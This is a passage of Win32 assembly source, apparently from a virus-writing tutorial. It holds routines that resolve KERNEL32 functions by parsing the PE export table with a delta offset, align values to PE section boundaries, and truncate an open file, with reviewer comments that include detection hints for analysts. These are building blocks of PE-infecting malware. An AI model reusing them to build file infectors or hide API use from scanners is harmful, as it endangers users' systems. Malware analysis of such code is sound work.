Win32


- 14


xchg edi,esi

xor al,al @@2: scasb jnz @@2

xchg edi,esi

@@3: cmp byte ptr [esi],0BBh jnz @@1

ret GetAPIs endp

; GetAPI - looks up one export by name in the PE image whose base address is
;          stored at [ebp+kernel], by walking that image's export directory,
;          and returns the export's address.
;
; input:
;      ESI - pointer to the zero-terminated name to look for
;      EBP - base for the [ebp+...] variables (presumably a delta offset;
;            confirm against the caller)
;      [ebp+kernel] - base address added to every RVA read below
;            (presumably the KERNEL32 image base; set outside this listing)
; output:
;      EAX - export address (RVA from the address table + base)
;      the three dwords starting at [ebp+AddressTableVA] are overwritten
; clobbers:
;      EBX, ECX, EDX, ESI, EDI, flags
;
; NOTE(review): no header field is validated and the search loop never
; consults the export directory's name count, so a name that is not exported
; keeps the loop reading past the end of the name table.
; NOTE(review): the first scasb runs before any cld, so the routine relies on
; the direction flag being clear on entry.
; For analysts: code that resolves APIs this way needs no import-table entry
; for them; the 3Ch / 78h / 1Ch header offsets followed by a name-compare
; loop are the recognizable shape of the routine.
GetAPI          proc
        mov     edx,esi                         ; EDX keeps the wanted name for every compare
        mov     edi,esi

        xor     al,al                           ; AL = 0, the terminator scasb searches for
@_1:    scasb
        jnz     @_1

        sub     edi,esi                         ; EDI = length of the name, terminator included
        mov     ecx,edi                         ; ECX = byte count for rep cmpsb

        xor     eax,eax                         ; clear EAX so lodsw leaves a zero-extended word
        mov     esi,3Ch                         ; 3Ch = offset of e_lfanew in the DOS header
        add     esi,[ebp+kernel]
        lodsw                                   ; only the low word of e_lfanew is read
        add     eax,[ebp+kernel]                ; EAX = address of the PE header

        mov     esi,[eax+78h]                   ; 78h = export directory RVA (PE32 layout)
        add     esi,1Ch                         ; 1Ch = AddressOfFunctions field in that directory

        add     esi,[ebp+kernel]

        lea     edi,[ebp+AddressTableVA]        ; stosd fills three consecutive dwords from here;
                                                ; assumes NameTableVA and OrdinalTableVA follow
                                                ; AddressTableVA in memory - TODO confirm

        lodsd                                   ; AddressOfFunctions RVA
        add     eax,[ebp+kernel]
        stosd

        lodsd                                   ; AddressOfNames RVA
        add     eax,[ebp+kernel]
        push    eax                             ; mov [NameTableVA],eax =) (also kept on the stack for the search)
        stosd

        lodsd                                   ; AddressOfNameOrdinals RVA
        add     eax,[ebp+kernel]
        stosd

        pop     esi                             ; ESI = start of the name pointer table

        xor     ebx,ebx                         ; EBX = index of the name being tested

@_3:    lodsd                                   ; EAX = RVA of the next exported name
        push    esi                             ; save the position in the name pointer table
        add     eax,[ebp+kernel]
        mov     esi,eax                         ; ESI = candidate name
        mov     edi,edx                         ; EDI = wanted name
        push    ecx                             ; rep cmpsb consumes ECX; keep the length
        cld
        rep     cmpsb                           ; compares length+terminator bytes, so a mere prefix does not match
        pop     ecx                             ; pop leaves the flags from cmpsb intact
        jz      @_4
        pop     esi                             ; no match: back to the table, next entry
        inc     ebx
        jmp     @_3

@_4:    pop     esi                             ; discard the saved table position (balances the push)
        xchg    eax,ebx                         ; EAX = index of the matching name
        shl     eax,1                           ; ordinal table entries are words
        add     eax,dword ptr [ebp+OrdinalTableVA]
        xor     esi,esi
        xchg    eax,esi                         ; ESI = ordinal entry address, EAX = 0 for lodsw
        lodsw                                   ; EAX = index into the address table
        shl     eax,2                           ; address table entries are dwords
        add     eax,dword ptr [ebp+AddressTableVA]
        mov     esi,eax
        lodsd                                   ; EAX = RVA of the export
        add     eax,[ebp+kernel]                ; RVA -> address
        ret
GetAPI          endp

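;-------------------------------------;
; Rounds a value up to a multiple of  ;
; an alignment factor. (The original  ;
; comment text was lost in extraction;;
; this summary is reconstructed from  ;
; the code below.)                    ;
;-------------------------------------;

; input:
;      EAX - value to align
;      ECX - alignment factor
; output:
;      EAX - aligned value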

; Align - returns EAX + (ECX - (EAX mod ECX)), i.e. EAX moved up to a
;         multiple of ECX.
;
; input:
;      EAX - value to align
;      ECX - alignment factor
; output:
;      EAX - aligned value
;      ECX - the amount that was added (factor - remainder)
; preserves:
;      EDX
;
; A value that is already a multiple of the factor has remainder 0, so a
; full factor is added to it rather than the value being returned unchanged.
; ECX = 0 raises a divide error in div.
Align           proc
        push    edx                             ; EDX is used by div; restore it for the caller
        xor     edx,edx                         ; div divides EDX:EAX, so the high half must be 0
        push    eax                             ; div replaces EAX with the quotient; keep the value
        div     ecx                             ; EDX = value mod factor
        pop     eax
        sub     ecx,edx                         ; ECX = factor - remainder
        add     eax,ecx
        pop     edx
        ret
Align           endp

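;-------------------------------------;
; Another routine for PE files: it    ;
; truncates the open file at a given  ;
; offset. (The original comment text  ;
; was lost in extraction; this summary;
; is reconstructed from the code      ;
; below.)                             ;
;-------------------------------------;

; input:
;      ECX - offset at which to truncate
; output:
;      nothing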

; TruncFile - moves the file pointer of the handle in [ebp+FileHandle] to the
;             offset in ECX and sets the end of file there.
;
; input:
;      ECX - offset, from the start of the file, at which to truncate
;      [ebp+FileHandle] - handle of the open file
;      [ebp+_SetFilePointer], [ebp+_SetEndOfFile] - pointers called below
;            (presumably the resolved KERNEL32 addresses; filled in outside
;            this listing)
; output:
;      none documented; EAX holds whatever the second call returned
;
; NOTE(review): the result of the first call is not checked, so a failed
; seek is followed by the set-end-of-file call anyway.
TruncFile       proc
        xor     eax,eax
        push    eax                             ; dwMoveMethod = 0 (FILE_BEGIN)
        push    eax                             ; lpDistanceToMoveHigh = NULL (32-bit offset only)
        push    ecx                             ; lDistanceToMove = offset to truncate at
        push    dword ptr [ebp+FileHandle]      ; hFile
        call    [ebp+_SetFilePointer]

        push    dword ptr [ebp+FileHandle]      ; hFile
        call    [ebp+_SetEndOfFile]             ; end of file = current file pointer
        ret
TruncFile       endp